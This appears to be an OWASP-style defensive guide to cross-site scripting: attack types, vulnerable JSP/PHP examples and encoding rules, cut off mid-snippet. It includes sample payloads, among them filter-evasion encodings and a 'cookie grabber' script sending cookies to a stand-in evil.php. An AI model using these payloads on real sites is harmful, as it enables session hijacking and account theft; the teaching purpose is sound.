Cross-site Scripting (XSS)

Overview

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. For more details on the different types of XSS flaws, see: Types of Cross-Site Scripting.

Description

Cross-Site Scripting (XSS) attacks occur when:

Data enters a Web application through an untrusted source, most frequently a web request.
The data is included in dynamic content that is sent to a web user without being validated for malicious content.

The malicious content sent to the web browser often takes the form of a segment of JavaScript, but may also include HTML, Flash, or any other type of code that the browser may execute. The variety of attacks based on XSS is almost limitless, but they commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user's machine under the guise of the vulnerable site.

Stored and Reflected XSS Attacks

XSS attacks can generally be divided into two categories: stored and reflected. A third, much less well-known type of XSS attack, DOM Based XSS, is discussed separately below.

Stored XSS Attacks (AKA Persistent or Type I)

Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type-I XSS.

Stored XSS generally occurs when user input is stored on the target server, such as in a database, in a message forum, visitor log, comment field, etc., and a victim is later able to retrieve the stored data from the web application without that data being made safe to render in the browser. With the advent of HTML5 and other browser technologies, we can also envision the attack payload being permanently stored in the victim’s browser, such as in an HTML5 database, and never being sent to the server at all.

Reflected XSS Attacks (AKA Non-Persistent or Type II)

Reflected attacks are those where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other web site. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user’s browser. The browser then executes the code because it came from a "trusted" server. Reflected XSS is also sometimes referred to as Non-Persistent or Type-II XSS.

DOM Based XSS (AKA Type-0)

DOM Based XSS is a form of XSS where the entire tainted data flow from source to sink takes place in the browser, i.e., the source of the data is in the DOM, the sink is also in the DOM, and the data flow never leaves the browser. For example, the source (where malicious data is read) could be the URL of the page (e.g., document.location.href), or it could be an element of the HTML, and the sink is a sensitive method call that causes the execution of the malicious data (e.g., document.write).

XSS Attack Consequences

The consequence of an XSS attack is the same regardless of whether it is stored or reflected (or DOM Based). The difference is in how the payload arrives at the server. Do not be fooled into thinking that a “read only” or “brochureware” site is not vulnerable to serious reflected XSS attacks. XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise. The most severe XSS attacks involve disclosure of the user’s session cookie, allowing an attacker to hijack the user’s session and take over the account. Other damaging attacks include disclosing end user files, installing Trojan horse programs, redirecting the user to some other page or site, or modifying the presentation of content. An XSS vulnerability allowing an attacker to modify a press release or news item could affect a company’s stock price or lessen consumer confidence. An XSS vulnerability on a pharmaceutical site could allow an attacker to modify dosage information, resulting in an overdose. For more information on these types of attacks, see Content Spoofing.

How to Determine If You Are Vulnerable

XSS flaws can be difficult to identify and remove from a web application. The best way to find flaws is to perform a security review of the code and search for all places where input from an HTTP request could possibly make its way into the HTML output. Note that a variety of different HTML tags can be used to transmit a malicious JavaScript payload. Nessus, Nikto, and some other available tools can help scan a website for these flaws, but they can only scratch the surface. If one part of a website is vulnerable, there is a high likelihood that there are other problems as well.

How to Protect Yourself

The primary defenses against XSS are described in the OWASP XSS Prevention Cheat Sheet.

Also, it's crucial that you turn off HTTP TRACE support on all web servers. An attacker can steal cookie data via JavaScript even when document.cookie is disabled or not supported on the client. The attack is mounted when a user posts a malicious script to a forum: when another user clicks the link, an asynchronous HTTP TRACE request is triggered, the server echoes that request (including the user's cookie header) back in its response, and the script forwards the collected cookie information to another malicious server, so the attacker can mount a session hijack attack. This is easily mitigated by removing support for HTTP TRACE on all web servers.

The OWASP ESAPI project has produced a set of reusable security components in several languages, including validation and escaping routines to prevent parameter tampering and the injection of XSS attacks. In addition, the OWASP WebGoat Project training application has lessons on Cross-Site Scripting and data encoding.

Alternate XSS Syntax

XSS using Script in Attributes

XSS attacks may be conducted without using <script></script> tags. Other tags will do exactly the same thing, for example:

<body onload=alert('test1')>

or other event handler attributes such as onmouseover and onerror.

onmouseover

<b onmouseover=alert('Wufff!')>click me!</b>

onerror

<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>

XSS using Script Via Encoded URI Schemes

To hide from web application filters, we may try to encode characters of the string, e.g. A = &#X41 (a hexadecimal HTML character reference), and use them in an IMG tag:

<IMG SRC=j&#X41vascript:alert('test2')>

There are many different character-encoding notations that give us even more possibilities.

XSS using code encoding

We may encode our script in base64 and place it in a META tag as a data: URL. This way the string alert() never appears in the page source at all. RFC 2397 defines the data: URL scheme used here.

<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">
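The META payload is less mysterious once the base64 part is decoded. The following Java sketch does just that; `DataUrlPayload` and `decodePayload` are hypothetical names, and it assumes the URL contains a `;base64,` marker as in the example above.

```java
import java.nio.charset.StandardCharsets;
import java.util.Base64;

final class DataUrlPayload {
    // Hypothetical helper: decode the base64 part of a data: URL so the hidden
    // markup can be inspected. Java's basic decoder accepts input without
    // trailing '=' padding, which matches the META example.
    static String decodePayload(String dataUrl) {
        String marker = ";base64,";
        int start = dataUrl.indexOf(marker);
        if (start < 0) {
            throw new IllegalArgumentException("not a base64 data: URL");
        }
        byte[] bytes = Base64.getDecoder().decode(dataUrl.substring(start + marker.length()));
        return new String(bytes, StandardCharsets.UTF_8);
    }

    public static void main(String[] args) {
        String url = "data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg";
        System.out.println(decodePayload(url)); // prints <script>alert('test3')</script>
    }
}
```

Seeing the decoded markup also shows why filtering raw input for strings such as `alert(` or `<script>` is fragile: the same payload can arrive in a form that contains neither.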

These and other examples can be found in the OWASP XSS Filter Evasion Cheat Sheet, which is a true encyclopedia of alternate XSS attack syntax.

Examples

Cross-site scripting attacks may occur anywhere that possibly malicious users are allowed to post unregulated material to a trusted web site for the consumption of other valid users.

The most common example can be found in bulletin-board web sites which provide web based mailing list-style functionality.

Example 1

The following JSP code segment reads an employee ID, eid, from an HTTP request and displays it to the user.

	<% String eid = request.getParameter("eid"); %> 
	...
	Employee ID: <%= eid %>

The code in this example operates correctly if eid contains only standard alphanumeric text. If eid has a value that includes meta-characters or source code, then the code will be executed by the web browser as it displays the HTTP response.

Initially this might not appear to be much of a vulnerability. After all, why would someone enter a URL that causes malicious code to run on their own computer? The real danger is that an attacker will create the malicious URL, then use e-mail or social engineering tricks to lure victims into visiting a link to the URL. When victims click the link, they unwittingly reflect the malicious content through the vulnerable web application back to their own computers. This mechanism of exploiting vulnerable web applications is known as Reflected XSS.
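To see why `<%= eid %>` is dangerous, the following Java sketch mimics what the JSP does, without a servlet container: it URL-decodes the `eid` value the way the container would and concatenates it into the response. `ReflectedEcho`, `renderEmployeeId`, and the example.test link are hypothetical.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;

final class ReflectedEcho {
    // Hypothetical stand-in for the JSP in Example 1: decode the raw query value
    // as a servlet container would, then place it into HTML with no encoding.
    static String renderEmployeeId(String rawQueryValue) {
        String eid = URLDecoder.decode(rawQueryValue, StandardCharsets.UTF_8);
        return "Employee ID: " + eid; // BUG: untrusted data written into HTML as-is
    }

    public static void main(String[] args) {
        // What the victim's browser sends after clicking a crafted (hypothetical) link such as
        // http://example.test/emp.jsp?eid=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E
        String fromLink = "%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E";
        System.out.println(renderEmployeeId(fromLink));
        // prints Employee ID: <script>alert(document.cookie)</script>
    }
}
```

The percent-encoding in the link hides the markup from a casual glance, but by the time the value reaches the page it is a live script element in the victim's browser.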

Example 2

The following JSP code segment queries a database for an employee with a given ID and prints the corresponding employee's name.

 
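	<%...
	 // bind eid as a parameter so the query itself is not open to SQL injection;
	 // executeQuery never returns null, so test rs.next() instead
	 PreparedStatement stmt = conn.prepareStatement("select * from emp where id = ?");
	 stmt.setString(1, eid);
	 ResultSet rs = stmt.executeQuery();
	 if (rs.next()) {
	  String name = rs.getString("name");
	%>
	
	Employee Name: <%= name %>
	
	<% } %>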

As in Example 1, this code functions correctly when the values of name are well-behaved, but it does nothing to prevent exploits if they are not. Again, this code can appear less dangerous because the value of name is read from a database, whose contents are apparently managed by the application. However, if the value of name originates from user-supplied data, then the database can be a conduit for malicious content. Without proper input validation on all data stored in the database, an attacker can execute malicious commands in the user's web browser. This type of exploit, known as Stored XSS, is particularly insidious because the indirection caused by the data store makes it more difficult to identify the threat and increases the possibility that the attack will affect multiple users. XSS got its start in this form with web sites that offered a "guestbook" to visitors. Attackers would include JavaScript in their guestbook entries, and all subsequent visitors to the guestbook page would execute the malicious code.
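The "conduit" effect can be shown with a tiny in-memory guestbook, the form in which XSS got its start. This is a hypothetical sketch: the `Guestbook` class and its `List` stand in for a real database, and the rendering deliberately repeats the mistake of Example 2.

```java
import java.util.ArrayList;
import java.util.List;

final class Guestbook {
    // In-memory stand-in for the database table that holds guestbook entries.
    private final List<String> entries = new ArrayList<>();

    // Anyone can post; the entry is stored exactly as submitted.
    void post(String entry) {
        entries.add(entry);
    }

    // Every visitor's page is rebuilt from the store. Because entries are
    // written into the HTML without encoding, one stored payload is served
    // to every visitor who loads the page afterwards.
    String renderPage() {
        StringBuilder html = new StringBuilder("<ul>\n");
        for (String entry : entries) {
            html.append("  <li>").append(entry).append("</li>\n");
        }
        return html.append("</ul>").toString();
    }
}
```

The attacker posts once, and every later call to `renderPage()` delivers the script. The fix belongs at the output step: encode each entry for the HTML context when rendering (Rule #1 below), however trustworthy the data store appears.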

As the examples demonstrate, XSS vulnerabilities are caused by code that includes unvalidated data in an HTTP response. There are three vectors by which an XSS attack can reach a victim:

As in Example 1, data is read directly from the HTTP request and reflected back in the HTTP response. Reflected XSS exploits occur when an attacker causes a user to supply dangerous content to a vulnerable web application, which is then reflected back to the user and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces victims to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the user, the content is executed and proceeds to transfer private information, such as cookies that may include session information, from the user's machine to the attacker or perform other nefarious activities.
As in Example 2, the application stores dangerous data in a database or other trusted data store. The dangerous data is subsequently read back into the application and included in dynamic content. Stored XSS exploits occur when an attacker injects dangerous content into a data store that is later read and included in dynamic content. From an attacker's perspective, the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user.
A source outside the application stores dangerous data in a database or other data store, and the dangerous data is subsequently read back into the application as trusted data and included in dynamic content.

Attack Examples

Example 1 : Cookie Grabber

If the application doesn't validate the input data, the attacker can easily steal a cookie from an authenticated user. All the attacker has to do is place the following code in any posted input (e.g., message boards, private messages, user profiles):

<SCRIPT type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
new Image().src = adr; // loading the "image" makes the browser request adr, cookie included
</SCRIPT>

The above code passes the escaped contents of the cookie (content must be URL-encoded before it can be sent in a GET query string) to the evil.php script in the "cakemonster" variable. The attacker then checks the results of the evil.php script (a cookie grabber script will usually write the cookie to a file) and uses it.

Error Page Example

Let's assume that we have an error page that handles requests for non-existent pages, a classic 404 error page. We may use the code below as an example to inform the user about which specific page is missing:

<html>
<body>

<?php
print "Not found: " . urldecode($_SERVER["REQUEST_URI"]);
?>

</body>
</html>

Let's see how it works:

http://testsite.test/file_which_not_exist

In response we get:

Not found: /file_which_not_exist

Now we will try to force the error page to include our code:

http://testsite.test/<script>alert("TEST");</script>

The result is:

Not found: / (but with JavaScript code <script>alert("TEST");</script>)

We have successfully injected our code: this is XSS. What does it mean? For example, we may use this flaw to try to steal a user's session cookie.
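The fix is to encode the decoded path for the HTML body before printing it. Here is a hedged Java translation of the error page; `NotFoundPage` and `render` are hypothetical names, and a real servlet would obtain the URI from `HttpServletRequest.getRequestURI()` rather than take it as a parameter.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;

final class NotFoundPage {
    // Minimal HTML-body encoder for the five XML-significant characters.
    static String encodeForHtml(String s) {
        StringBuilder out = new StringBuilder(s.length());
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&': out.append("&amp;"); break;
                case '<': out.append("&lt;"); break;
                case '>': out.append("&gt;"); break;
                case '"': out.append("&quot;"); break;
                case '\'': out.append("&#x27;"); break;
                default: out.append(c);
            }
        }
        return out.toString();
    }

    // Same output as the PHP page, except the decoded path is encoded before use.
    static String render(String requestUri) {
        String path;
        try {
            // URLDecoder follows form-decoding rules ('+' becomes a space), like PHP's urldecode
            path = URLDecoder.decode(requestUri, StandardCharsets.UTF_8);
        } catch (IllegalArgumentException malformedEscape) {
            path = requestUri; // e.g. "%zz": keep the raw value, which is still encoded below
        }
        return "<html>\n<body>\nNot found: " + encodeForHtml(path) + "\n</body>\n</html>";
    }
}
```

With this version, the injected request from the example is displayed as the literal text `/<script>alert("TEST");</script>` instead of being executed.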

Types of Cross-Site Scripting

For years, most people thought of these (Stored, Reflected, DOM) as three different types of XSS, but in reality, they overlap. You can have both Stored and Reflected DOM Based XSS. You can also have Stored and Reflected Non-DOM Based XSS, but that’s confusing, so to help clarify things, starting about mid-2012, the research community proposed and started using two new terms to help organize the types of XSS that can occur:

Server XSS
Client XSS

Server XSS

Server XSS occurs when untrusted user supplied data is included in an HTML response generated by the server. The source of this data could be from the request, or from a stored location. As such, you can have both Reflected Server XSS and Stored Server XSS.

In this case, the entire vulnerability is in server-side code, and the browser is simply rendering the response and executing any valid script embedded in it.

Client XSS

Client XSS occurs when untrusted user supplied data is used to update the DOM with an unsafe JavaScript call. A JavaScript call is considered unsafe if it can be used to introduce valid JavaScript into the DOM. The source of this data could be from the DOM, or it could have been sent by the server (via an AJAX call, or a page load). The ultimate source of the data could have been from a request, or from a stored location on the client or the server. As such, you can have both Reflected Client XSS and Stored Client XSS.

With these new definitions, the definition of DOM Based XSS doesn’t change. DOM Based XSS is simply a subset of Client XSS, where the source of the data is somewhere in the DOM, rather than from the Server.

Given that both Server XSS and Client XSS can be Stored or Reflected, this new terminology results in a simple, clean 2 x 2 matrix with Client & Server XSS on one axis and Stored and Reflected XSS on the other:

                 Server XSS              Client XSS
 Stored          Stored Server XSS       Stored Client XSS
 Reflected       Reflected Server XSS    Reflected Client XSS

Recommended Server XSS Defenses

Server XSS is caused by including untrusted data in an HTML response. The easiest and strongest defense against Server XSS in most cases is:

Context-sensitive server side output encoding

How to implement context-sensitive server side output encoding is explained in great detail in the OWASP XSS (Cross Site Scripting) Prevention Cheat Sheet.

Input validation or data sanitization can also be performed to help prevent Server XSS, but it’s much more difficult to get correct than context-sensitive output encoding.

Recommended Client XSS Defenses

Client XSS is caused when untrusted data is used to update the DOM with an unsafe JavaScript call. The easiest and strongest defense against Client XSS is:

Using safe JavaScript APIs

However, developers frequently don’t know which JavaScript APIs are safe or not, never mind which methods in their favorite JavaScript library are safe. Some information on which JavaScript and jQuery methods are safe and unsafe is presented in Dave Wichers’ DOM Based XSS talk presented at OWASP AppSec USA in 2012: Unraveling some of the Mysteries around DOM Based XSS

If you know that a JavaScript method is unsafe, our primary recommendation is to find an alternative safe method to use. If you can’t for some reason, then context sensitive output encoding can be done in the browser, before passing that data to the unsafe JavaScript method. OWASP’s guidance on how to do this properly is presented in the DOM based XSS Prevention Cheat Sheet. Note that this guidance is applicable to all types of Client XSS, regardless of where the data actually comes from (DOM or Server).

This article provides a simple positive model for preventing XSS using output escaping/encoding properly. While there are a huge number of XSS attack vectors, following a few simple rules can completely defend against this serious attack. This article does not explore the technical or business impact of XSS. Suffice it to say that it can lead to an attacker gaining the ability to do anything a victim can do through their browser.

A Positive XSS Prevention Model

This article treats an HTML page like a template, with slots where a developer is allowed to put untrusted data. These slots cover the vast majority of the common places where a developer might want to put untrusted data. Putting untrusted data in other places in the HTML is not allowed. This is a "whitelist" model, that denies everything that is not specifically allowed.

Given the way browsers parse HTML, each of the different types of slots has slightly different security rules. When you put untrusted data into these slots, you need to take certain steps to make sure that the data does not break out of that slot into a context that allows code execution. In a way, this approach treats an HTML document like a parameterized database query - the data is kept in specific places and is isolated from code contexts with escaping.

This document sets out the most common types of slots and the rules for putting untrusted data into them safely. Based on the various specifications, known XSS vectors, and a great deal of manual testing with all the popular browsers, we have determined that the rules proposed here are safe.

The slots are defined and a few examples of each are provided. Developers SHOULD NOT put data into any other slots without a very careful analysis to ensure that what they are doing is safe. Browser parsing is extremely tricky and many innocuous looking characters can be significant in the right context.

Why Can't I Just HTML Entity Encode Untrusted Data?

HTML entity encoding is okay for untrusted data that you put in the body of the HTML document, such as inside a <div> tag. It even sort of works for untrusted data that goes into attributes, particularly if you're religious about using quotes around your attributes. But HTML entity encoding doesn't work if you're putting untrusted data inside a <script> tag anywhere, or an event handler attribute like onmouseover, or inside CSS, or in a URL. So even if you use an HTML entity encoding method everywhere, you are still most likely vulnerable to XSS. You MUST use the escape syntax for the part of the HTML document you're putting untrusted data into. That's what the rules below are all about.

You Need a Security Encoding Library

Writing these encoders is not tremendously difficult, but there are quite a few hidden pitfalls. For example, you might be tempted to use some of the escaping shortcuts like \" in JavaScript. However, these values are dangerous and may be misinterpreted by the nested parsers in the browser. You might also forget to escape the escape character, which attackers can use to neutralize your attempts to be safe. OWASP recommends using a security-focused encoding library to make sure these rules are properly implemented.

Microsoft provides an encoding library named the Microsoft Anti-Cross Site Scripting Library for the .NET platform, and the ASP.NET Framework has a built-in ValidateRequest function that provides limited sanitization.

The OWASP ESAPI project has created an escaping library for Java. OWASP also provides the OWASP Java Encoder Project for high-performance encoding.

XSS Prevention Rules

The following rules are intended to prevent all XSS in your application. While these rules do not allow absolute freedom in putting untrusted data into an HTML document, they should cover the vast majority of common use cases. You do not have to allow all the rules in your organization. Many organizations may find that allowing only Rule #1 and Rule #2 is sufficient for their needs. Please add a note to the discussion page if there is an additional context that is often required and can be secured with escaping.

Do NOT simply escape the list of example characters provided in the various rules. It is NOT sufficient to escape only that list. Blacklist approaches are quite fragile. The whitelist rules here have been carefully designed to provide protection even against future vulnerabilities introduced by browser changes.

RULE #0 - Never Insert Untrusted Data Except in Allowed Locations

The first rule is to deny all: don't put untrusted data into your HTML document unless it is within one of the slots defined in Rule #1 through Rule #5. The reason for Rule #0 is that there are so many strange contexts within HTML that the list of escaping rules gets very complicated. We can't think of any good reason to put untrusted data in these contexts. This includes "nested contexts" like a URL inside JavaScript: the encoding rules for those locations are tricky and dangerous. If you insist on putting untrusted data into nested contexts, please do a lot of cross-browser testing and let us know what you find out.

 <script>...NEVER PUT UNTRUSTED DATA HERE...</script>   directly in a script

 <!--...NEVER PUT UNTRUSTED DATA HERE...-->             inside an HTML comment

 <div ...NEVER PUT UNTRUSTED DATA HERE...=test />       in an attribute name

 <NEVER PUT UNTRUSTED DATA HERE... href="/test" />      in a tag name

 <style>...NEVER PUT UNTRUSTED DATA HERE...</style>     directly in CSS

Most importantly, never accept actual JavaScript code from an untrusted source and then run it. For example, never execute a parameter named "callback" that contains a JavaScript code snippet. No amount of escaping can fix that.

RULE #1 - HTML Escape Before Inserting Untrusted Data into HTML Element Content

Rule #1 is for when you want to put untrusted data directly into the HTML body somewhere. This includes inside normal tags like div, p, b, td, etc. Most web frameworks have a method for HTML escaping for the characters detailed below. However, this is absolutely not sufficient for other HTML contexts. You need to implement the other rules detailed here as well.

 <body>...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...</body>
 
 <div>...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...</div>
 
 any other normal HTML elements

Escape the following characters with HTML entity encoding to prevent switching into any execution context, such as script, style, or event handlers. Using hex entities is recommended in the spec. In addition to the 5 characters significant in XML (&, <, >, ", '), the forward slash is included as it helps to end an HTML entity.

 & --> &amp;
 < --> &lt;
 > --> &gt;
 " --> &quot;
 ' --> &#x27;     &apos; is not recommended because it's not in the HTML 4 spec (see section 24.4.1); &apos; is in the XML and XHTML specs.
 / --> &#x2F;     forward slash is included as it helps end an HTML entity

See the ESAPI reference implementation of HTML entity escaping and unescaping.

 String safe = ESAPI.encoder().encodeForHTML( request.getParameter( "input" ) );
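ESAPI (or the OWASP Java Encoder) is what you should use in practice. To show what Rule #1 actually does, here is a minimal sketch in plain Java; `HtmlBodyEncoder` and `encodeForHtml` are hypothetical names, not ESAPI's API, and returning an empty string for `null` is a design choice of this sketch.

```java
final class HtmlBodyEncoder {
    // Rule #1 sketch: the six characters from the table above become entities;
    // every other character is copied through unchanged.
    static String encodeForHtml(String input) {
        if (input == null) {
            return "";
        }
        StringBuilder out = new StringBuilder(input.length() + 16);
        for (int i = 0; i < input.length(); i++) {
            char c = input.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#x27;"); break;
                case '/':  out.append("&#x2F;"); break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }
}
```

For example, `encodeForHtml("<b onmouseover='x'>A & B</b>")` yields `&lt;b onmouseover=&#x27;x&#x27;&gt;A &amp; B&lt;&#x2F;b&gt;`, which a browser displays as text inside a `<div>` rather than parsing as a tag. This encoder is only valid for element content; the other rules exist because it is not enough elsewhere.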

RULE #2 - Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes

Rule #2 is for putting untrusted data into typical attribute values like width, name, value, etc. This should not be used for complex attributes like href, src, style, or any of the event handlers like onmouseover. It is extremely important that event handler attributes follow Rule #3 for HTML JavaScript Data Values.

 <div attr=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...>content</div>     inside UNquoted attribute
 
 <div attr='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'>content</div>   inside single quoted attribute
 
 <div attr="...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...">content</div>   inside double quoted attribute

Except for alphanumeric characters, escape all characters with ASCII values less than 256 with the &#xHH; format (or a named entity if available) to prevent switching out of the attribute. The reason this rule is so broad is that developers frequently leave attributes unquoted. Properly quoted attributes can only be broken out of with the corresponding quote. Unquoted attributes can be broken out of with many characters, including [space] % * + , - / ; < = > ^ and |.

See the ESAPI reference implementation of HTML entity escaping and unescaping.

 String safe = ESAPI.encoder().encodeForHTMLAttribute( request.getParameter( "input" ) );
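A minimal sketch of Rule #2 in plain Java follows; `HtmlAttributeEncoder` is a hypothetical name, and passing characters at or above 256 through unchanged is an assumption of this sketch (the rule itself only speaks about values below 256, and no character outside ASCII can end an HTML attribute).

```java
final class HtmlAttributeEncoder {
    private static final char[] HEX = "0123456789ABCDEF".toCharArray();

    // Rule #2 sketch: ASCII letters and digits pass through; every other
    // character below 256 becomes &#xHH; with exactly two hex digits.
    // Characters at or above 256 are copied unchanged (an assumption).
    static String encodeForHtmlAttribute(String input) {
        StringBuilder out = new StringBuilder(input.length() * 2);
        for (int i = 0; i < input.length(); i++) {
            char c = input.charAt(i);
            if (isAsciiAlphanumeric(c) || c >= 256) {
                out.append(c);
            } else {
                out.append("&#x").append(HEX[c >> 4]).append(HEX[c & 0xF]).append(';');
            }
        }
        return out.toString();
    }

    private static boolean isAsciiAlphanumeric(char c) {
        return (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9');
    }
}
```

The input `x onmouseover=alert(1)` becomes `x&#x20;onmouseover&#x3D;alert&#x28;1&#x29;`: with no raw space or `=` left, it cannot start a new attribute even if the developer forgot the quotes.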

RULE #3 - JavaScript Escape Before Inserting Untrusted Data into JavaScript Data Values

Rule #3 concerns dynamically generated JavaScript code - both script blocks and event-handler attributes. The only safe place to put untrusted data into this code is inside a quoted "data value." Including untrusted data inside any other JavaScript context is quite dangerous, as it is extremely easy to switch into an execution context with characters including (but not limited to) semi-colon, equals, space, plus, and many more, so use with caution.

 <script>alert('...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...')</script>     inside a quoted string
 
 <script>x='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'</script>          one side of a quoted expression
 
 <div onmouseover="x='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'"></div>  inside quoted event handler

Please note there are some JavaScript functions that can never safely use untrusted data as input - EVEN IF JAVASCRIPT ESCAPED!

For example:

 <script>
 window.setInterval('...EVEN IF YOU ESCAPE UNTRUSTED DATA YOU ARE XSSED HERE...');
 </script>

Except for alphanumeric characters, escape all characters less than 256 with the \xHH format to prevent switching out of the data value into the script context or into another attribute. DO NOT use any escaping shortcuts like \" because the quote character may be matched by the HTML attribute parser which runs first. These escaping shortcuts are also susceptible to "escape-the-escape" attacks where the attacker sends \" and the vulnerable code turns that into \\" which enables the quote.

If an event handler is properly quoted, breaking out requires the corresponding quote. However, we have intentionally made this rule quite broad because event handler attributes are often left unquoted. Unquoted attributes can be broken out of with many characters including [space] % * + , - / ; < = > ^ and |. Also, a </script> closing tag will close a script block even though it is inside a quoted string because the HTML parser runs before the JavaScript parser.

See the ESAPI reference implementation of JavaScript escaping and unescaping.

 String safe = ESAPI.encoder().encodeForJavaScript( request.getParameter( "input" ) );
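The \xHH rule can be sketched in a few lines of Java. `JavaScriptEncoder` is a hypothetical name, and encoding characters at or above 256 as four-digit Unicode escapes is an assumption beyond the rule's text; it also covers U+2028 and U+2029, which could not appear unescaped in JavaScript string literals before ES2019.

```java
final class JavaScriptEncoder {
    private static final char[] HEX = "0123456789ABCDEF".toCharArray();

    // Rule #3 sketch for text placed inside a quoted JavaScript string.
    // ASCII letters and digits pass through; other characters below 256 become \xHH.
    // Characters at or above 256 become a backslash-u escape with four hex digits
    // (an assumption; the rule only covers values below 256).
    static String encodeForJavaScript(String input) {
        StringBuilder out = new StringBuilder(input.length() * 4);
        for (int i = 0; i < input.length(); i++) {
            char c = input.charAt(i);
            if (isAsciiAlphanumeric(c)) {
                out.append(c);
            } else if (c < 256) {
                out.append("\\x").append(HEX[c >> 4]).append(HEX[c & 0xF]);
            } else {
                out.append("\\u")
                   .append(HEX[(c >> 12) & 0xF]).append(HEX[(c >> 8) & 0xF])
                   .append(HEX[(c >> 4) & 0xF]).append(HEX[c & 0xF]);
            }
        }
        return out.toString();
    }

    private static boolean isAsciiAlphanumeric(char c) {
        return (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9');
    }
}
```

Note that no shortcut such as \" is ever emitted, and `</script>` comes out as `\x3C\x2Fscript\x3E`, so the HTML parser, which runs first, finds nothing that could close the script block.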

RULE #3.1 - HTML escape JSON values in an HTML context and read the data with JSON.parse

In a Web 2.0 world, the need for having data dynamically generated by an application in a JavaScript context is common. One strategy is to make an AJAX call to get the values, but this isn't always performant. Often, an initial block of JSON is loaded into the page to act as a single place to store multiple values. This data is tricky, though not impossible, to escape correctly without breaking the format and content of the values.

Ensure the returned Content-Type header is application/json and not text/html. This instructs the browser not to misinterpret the context and execute the injected script.

Bad HTTP response:

   HTTP/1.1 200
   Date: Wed, 06 Feb 2013 10:28:54 GMT
   Server: Microsoft-IIS/7.5....
   Content-Type: text/html; charset=utf-8 <-- bad
   ....
   Content-Length: 373
   Keep-Alive: timeout=5, max=100
   Connection: Keep-Alive
   {"Message":"No HTTP resource was found that matches the request URI 'dev.net.ie/api/pay/.html?HouseNumber=9&AddressLine
   =The+Gardens<script>alert(1)</script>&AddressLine2=foxlodge+woods&TownName=Meath'.","MessageDetail":"No type was found
   that matches the controller named 'pay'."}   <-- this script will pop!!

Good HTTP response

   HTTP/1.1 200
   Date: Wed, 06 Feb 2013 10:28:54 GMT
   Server: Microsoft-IIS/7.5....
   Content-Type: application/json; charset=utf-8 <--good
   .....
   .....

A common anti-pattern one would see:

   <script>
     var initData = <%= data.to_json %>; // Do NOT do this without encoding the data with one of the techniques listed below.
   </script>

JSON entity encoding

The rules for JSON encoding can be found in the Output Encoding Rules Summary. Note, this will not allow you to use XSS protection provided by CSP 1.0.

HTML entity encoding

This technique has the advantage that HTML entity escaping is widely supported and helps separate data from server side code without crossing any context boundaries. Consider placing the JSON block on the page as a normal element and then reading its text content to get the data. The JavaScript that reads the element can live in an external file, making CSP enforcement easier to implement.

 <script id="init_data" type="application/json">
    <%= html_escape(data.to_json) %>
 </script>

 // external js file
 var dataElement = document.getElementById('init_data');
 // read the raw (still HTML-escaped) text of the element
 var jsonText = dataElement.textContent || dataElement.innerText;
 // undo the server-side html_escape, then parse the JSON
 var initData = JSON.parse(html_unescape(jsonText));

An alternative to escaping and unescaping JSON directly in JavaScript is to normalize JSON server-side by converting '<' to '\u003c' before delivering it to the browser.
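A minimal Java sketch of that server-side normalization follows. It assumes the JSON text has already been produced by a proper JSON serializer (not by string concatenation); `JsonForScriptBlock` and `normalize` are hypothetical names.

```java
final class JsonForScriptBlock {
    // Hypothetical helper: replaces every '<' in serializer output with the
    // six-character JSON escape for U+003C. In valid JSON, '<' can only occur
    // inside string values, where the escape decodes back to '<', so JSON.parse
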